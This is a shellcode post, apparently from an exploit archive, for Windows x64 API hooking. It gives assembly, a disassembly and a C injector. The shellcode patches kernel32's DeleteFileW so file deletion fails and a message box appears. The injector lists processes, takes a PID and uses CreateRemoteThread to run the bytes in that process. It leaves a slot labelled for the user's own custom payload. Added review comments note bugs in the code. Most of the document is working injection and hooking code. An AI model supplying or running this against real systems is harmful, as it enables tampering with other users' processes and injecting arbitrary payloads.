
Windows x64 - API Hooking Shellcode (117 bytes)


Windows x64 API Hooking Shellcode by Roziul Hasan Khan Shifat, 117 bytes, hooks the DeleteFileW() API to block file deletion

Code
/*

	# Title : Windows x64 API Hooking Shellcode
	# Author : Roziul Hasan Khan Shifat
	# Size : 117 bytes
	# Date : 16/10/2017
	# Email : [email protected]
	# Tested On : Windows 7 Ultimate x64



*/


/*

This shellcode hooks the DeleteFileW() API
Warning: Do not use this shellcode on explorer.exe, otherwise you won't be able to delete files from the Recycle Bin

*/



/*


section .text
	global _start
_start:

xor rdx,rdx
mov rax,[gs:rdx+0x60] ;PPEB
mov rax,[rax+24] ;PPEB->Ldr
mov rsi,[rax+32] ;Ldr->InMemOrderModuleList.Flink
mov rax,[rsi]
mov rsi,[rax]

mov rdi,[rsi+32] ;rdi=kernel32.dll base Address

;---------------------------------------------------------------
xor rsi,rsi
mov si,0x29f0
add rsi,rdi ;rsi=VirtualProtect()

;----------------------------------
;Both offsets (0x29f0 above, 0xa2b0 below) are RVAs taken from the kernel32.dll build the author tested (Windows 7 Ultimate x64); they will not match other Windows builds

xor r12,r12
mov r12w,0xa2b0  ;0x0000a2b0 is Relative Address of DeleteFileW()
add r12,rdi ;r12=DeleteFileW()

;---------------------------------------------------
;Changing the memory protection of the hook target so it can be written (the previous protection value is kept at [r14])
mov rcx,r12
push rdx

mov dl,9

pop r8
mov r8b,0x40
sub rsp,4
lea r14,[rsp]
mov r9,r14
call rsi

;--------------------------------------------------------
mov [r12],byte 0xe9
jmp shellcode

inj:
pop rdx
sub rdx,r12
sub rdx,5
mov [r12+1],rdx

xor rdx,rdx
mov dl,9
mov rcx,r12
mov r8d,dword [r14]
mov r9,r14

call rsi
add rsp,4
ret



shellcode:
call inj
;The author's own payload; this is what the hooked DeleteFileW() ends up running (disassembled from offset 0x75 onward below)
db 0x48,0x31,0xd2,0x65,0x48,0x8b,0x42,0x60,0x48,0x8b,0x40,0x18,0x48,0x8b,0x70,0x20,0x48,0x8b,0x06,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x20,0x68,0x90,0x65,0x01,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xfb,0x52,0x52,0x48,0xb8,0x75,0x73,0x65,0x72,0x33,0x32,0x2e,0x64,0x48,0x89,0x04,0x24,0x66,0xc7,0x44,0x24,0x08,0x6c,0x6c,0x48,0x8d,0x0c,0x24,0x48,0x83,0xec,0x58,0xff,0xd3,0x68,0xb8,0x12,0x07,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xc3,0x48,0x31,0xc9,0x6a,0x10,0x41,0x59,0x51,0x51,0x48,0xba,0x41,0x50,0x49,0x20,0x42,0x6c,0x6f,0x63,0x48,0x89,0x14,0x24,0xc7,0x44,0x24,0x08,0x6b,0x65,0x64,0x21,0x48,0x8d,0x14,0x24,0x52,0x41,0x58,0x48,0x83,0xec,0x58,0x48,0x83,0xec,0x58,0xff,0xd3,0x90,0x48,0x31,0xd2,0x66,0xba,0x28,0x01,0x48,0x01,0xd4,0xc3













*/



/*


apiint.obj:     file format pe-x86-64


Disassembly of section .text:

0000000000000000 <_start>:
   0:	48 31 d2             	xor    %rdx,%rdx
   3:	65 48 8b 42 60       	mov    %gs:0x60(%rdx),%rax
   8:	48 8b 40 18          	mov    0x18(%rax),%rax
   c:	48 8b 70 20          	mov    0x20(%rax),%rsi
  10:	48 8b 06             	mov    (%rsi),%rax
  13:	48 8b 30             	mov    (%rax),%rsi
  16:	48 8b 7e 20          	mov    0x20(%rsi),%rdi
  1a:	48 31 f6             	xor    %rsi,%rsi
  1d:	66 be f0 29          	mov    $0x29f0,%si
  21:	48 01 fe             	add    %rdi,%rsi
  24:	4d 31 e4             	xor    %r12,%r12
  27:	66 41 bc b0 a2       	mov    $0xa2b0,%r12w
  2c:	49 01 fc             	add    %rdi,%r12
  2f:	4c 89 e1             	mov    %r12,%rcx
  32:	52                   	push   %rdx
  33:	b2 09                	mov    $0x9,%dl
  35:	41 58                	pop    %r8
  37:	41 b0 40             	mov    $0x40,%r8b
  3a:	48 83 ec 04          	sub    $0x4,%rsp
  3e:	4c 8d 34 24          	lea    (%rsp),%r14
  42:	4d 89 f1             	mov    %r14,%r9
  45:	ff d6                	callq  *%rsi
  47:	41 c6 04 24 e9       	movb   $0xe9,(%r12)
  4c:	eb 22                	jmp    70 <shellcode>

000000000000004e <inj>:
  4e:	5a                   	pop    %rdx
  4f:	4c 29 e2             	sub    %r12,%rdx
  52:	48 83 ea 05          	sub    $0x5,%rdx
  56:	49 89 54 24 01       	mov    %rdx,0x1(%r12)
  5b:	48 31 d2             	xor    %rdx,%rdx
  5e:	b2 09                	mov    $0x9,%dl
  60:	4c 89 e1             	mov    %r12,%rcx
  63:	45 8b 06             	mov    (%r14),%r8d
  66:	4d 89 f1             	mov    %r14,%r9
  69:	ff d6                	callq  *%rsi
  6b:	48 83 c4 04          	add    $0x4,%rsp
  6f:	c3                   	retq   

0000000000000070 <shellcode>:
  70:	e8 d9 ff ff ff       	callq  4e <inj>
  75:	48 31 d2             	xor    %rdx,%rdx
  78:	65 48 8b 42 60       	mov    %gs:0x60(%rdx),%rax
  7d:	48 8b 40 18          	mov    0x18(%rax),%rax
  81:	48 8b 70 20          	mov    0x20(%rax),%rsi
  85:	48 8b 06             	mov    (%rsi),%rax
  88:	48 8b 30             	mov    (%rax),%rsi
  8b:	48 8b 7e 20          	mov    0x20(%rsi),%rdi
  8f:	68 90 65 01 0a       	pushq  $0xa016590
  94:	80 74 24 03 0a       	xorb   $0xa,0x3(%rsp)
  99:	5b                   	pop    %rbx
  9a:	48 01 fb             	add    %rdi,%rbx
  9d:	52                   	push   %rdx
  9e:	52                   	push   %rdx
  9f:	48 b8 75 73 65 72 33 	movabs $0x642e323372657375,%rax
  a6:	32 2e 64 
  a9:	48 89 04 24          	mov    %rax,(%rsp)
  ad:	66 c7 44 24 08 6c 6c 	movw   $0x6c6c,0x8(%rsp)
  b4:	48 8d 0c 24          	lea    (%rsp),%rcx
  b8:	48 83 ec 58          	sub    $0x58,%rsp
  bc:	ff d3                	callq  *%rbx
  be:	68 b8 12 07 0a       	pushq  $0xa0712b8
  c3:	80 74 24 03 0a       	xorb   $0xa,0x3(%rsp)
  c8:	5b                   	pop    %rbx
  c9:	48 01 c3             	add    %rax,%rbx
  cc:	48 31 c9             	xor    %rcx,%rcx
  cf:	6a 10                	pushq  $0x10
  d1:	41 59                	pop    %r9
  d3:	51                   	push   %rcx
  d4:	51                   	push   %rcx
  d5:	48 ba 41 50 49 20 42 	movabs $0x636f6c4220495041,%rdx
  dc:	6c 6f 63 
  df:	48 89 14 24          	mov    %rdx,(%rsp)
  e3:	c7 44 24 08 6b 65 64 	movl   $0x2164656b,0x8(%rsp)
  ea:	21 
  eb:	48 8d 14 24          	lea    (%rsp),%rdx
  ef:	52                   	push   %rdx
  f0:	41 58                	pop    %r8
  f2:	48 83 ec 58          	sub    $0x58,%rsp
  f6:	48 83 ec 58          	sub    $0x58,%rsp
  fa:	ff d3                	callq  *%rbx
  fc:	90                   	nop
  fd:	48 31 d2             	xor    %rdx,%rdx
 100:	66 ba 28 01          	mov    $0x128,%dx
 104:	48 01 d4             	add    %rdx,%rsp
 107:	c3                   	retq   






*/






#include<stdio.h>
#include<windows.h>
#include<tlhelp32.h>
#include<string.h>

unsigned char shellcode[]=\

//Main Shellcode (Interceptor Shellcode)
// Byte-for-byte the <_start>/<inj> part of the disassembly above (offsets 0x00-0x74).
// The final \xe8\xd9\xff\xff\xff is the `call inj` at 0x70 and must stay the last
// bytes of this part: inj pops that call's return address to find the payload.

"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\x8b\x06\x48\x8b\x30\x48\x8b\x7e\x20\x48\x31\xf6\x66\xbe\xf0\x29\x48\x01\xfe\x4d\x31\xe4\x66\x41\xbc\xb0\xa2\x49\x01\xfc\x4c\x89\xe1\x52\xb2\x09\x41\x58\x41\xb0\x40\x48\x83\xec\x04\x4c\x8d\x34\x24\x4d\x89\xf1\xff\xd6\x41\xc6\x04\x24\xe9\xeb\x22\x5a\x4c\x29\xe2\x48\x83\xea\x05\x49\x89\x54\x24\x01\x48\x31\xd2\xb2\x09\x4c\x89\xe1\x45\x8b\x06\x4d\x89\xf1\xff\xd6\x48\x83\xc4\x04\xc3\xe8\xd9\xff\xff\xff"

//Your Custom shellcode 
// Caveat: main() measures this whole array with strlen(), so a payload that
// contains a 0x00 byte is silently truncated at that byte. The published bytes
// happen to contain no NUL; sizeof(shellcode)-1 would be the exact length.

"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\x8b\x06\x48\x8b\x30\x48\x8b\x7e\x20\x68\x90\x65\x01\x0a\x80\x74\x24\x03\x0a\x5b\x48\x01\xfb\x52\x52\x48\xb8\x75\x73\x65\x72\x33\x32\x2e\x64\x48\x89\x04\x24\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x68\xb8\x12\x07\x0a\x80\x74\x24\x03\x0a\x5b\x48\x01\xc3\x48\x31\xc9\x6a\x10\x41\x59\x51\x51\x48\xba\x41\x50\x49\x20\x42\x6c\x6f\x63\x48\x89\x14\x24\xc7\x44\x24\x08\x6b\x65\x64\x21\x48\x8d\x14\x24\x52\x41\x58\x48\x83\xec\x58\x48\x83\xec\x58\xff\xd3\x90\x48\x31\xd2\x66\xba\x28\x01\x48\x01\xd4\xc3";



/*
 * Test driver for the shellcode array above.
 *
 * Lists every running process as "name : PID", prompts for a PID, allocates
 * RWX memory in that process, copies `shellcode` into it, drops the region to
 * RX and starts a remote thread at its first byte.
 *
 * Returns 0 on every path, including the error paths below; a nonzero exit
 * code would let a caller distinguish failure from success.
 *
 * Review notes (code left exactly as published):
 *  - `snap` is never passed to CloseHandle() on any path (handle leak).
 *  - The return values of WriteProcessMemory(), VirtualProtectEx() and
 *    CreateRemoteThread() are not checked, and the thread handle returned by
 *    CreateRemoteThread() is never closed.
 *  - `%ld` is used for DWORD values (unsigned long on Windows); `%lu` is the
 *    matching specifier for both the printf() and the scanf() below.
 */
int main()
{
	HANDLE snap,proc,mem;   /* mem is really the LPVOID from VirtualAllocEx(); HANDLE only works because both are void* */
	DWORD len,l,pid;        /* l receives the previous protection from VirtualProtectEx() and is not read afterwards */
	PROCESSENTRY32 ps;
	
	
	ps.dwSize=sizeof(ps);   /* dwSize must be filled in before Process32First() */
	/* strlen() stops at the first 0x00 byte and expects a char*, so this is
	   only correct while the payload contains no NUL; sizeof(shellcode)-1 is
	   the exact, type-correct length. */
	len=strlen(shellcode);
	
	
	snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
	if(snap==INVALID_HANDLE_VALUE)
	{
		printf("CreateToolhelp32Snapshot() Failed");
		return 0;
	}
	
	
	if(!Process32First(snap,&ps))
	{
		printf("Process32First() Failed");
		return 0;   /* snap leaks here and on every later return */
	}
	
	
	
	do
	{
		printf("%s : %ld\n",ps.szExeFile,ps.th32ProcessID);   /* th32ProcessID is a DWORD: %lu is the matching specifier */
	}while(Process32Next(snap,&ps));
	
	printf("\nEnter Process ID: ");
	scanf("%ld",&pid);   /* return value unchecked: non-numeric input leaves pid uninitialized; %lu matches DWORD */
	
	
	proc=OpenProcess(PROCESS_ALL_ACCESS,0,pid);   /* requests every access right; the calls below need only the thread-creation and VM rights */
	
	if(!proc)
	{
		printf("Failed to Open Process");
		return 0;
	}
	
	/* Allocated writable+executable first so the copy can land, then downgraded
	   to PAGE_EXECUTE_READ below once the bytes are in place. */
	mem=VirtualAllocEx(proc,NULL,len,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
	if(!mem)
	{
		printf("Failed to allocate memory in process");
		return 0;
	}
	
	WriteProcessMemory(proc,mem,shellcode,len,NULL);   /* result unchecked: a failed or partial copy is not detected before the thread starts */
	VirtualProtectEx(proc,mem,len,PAGE_EXECUTE_READ,&l);   /* W^X: write access dropped after the copy; result unchecked */
	
	CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)mem,NULL,0,0);   /* returned thread handle is neither checked nor closed */
	CloseHandle(proc);   /* snap is still open at this point */
	
	return 0;
}
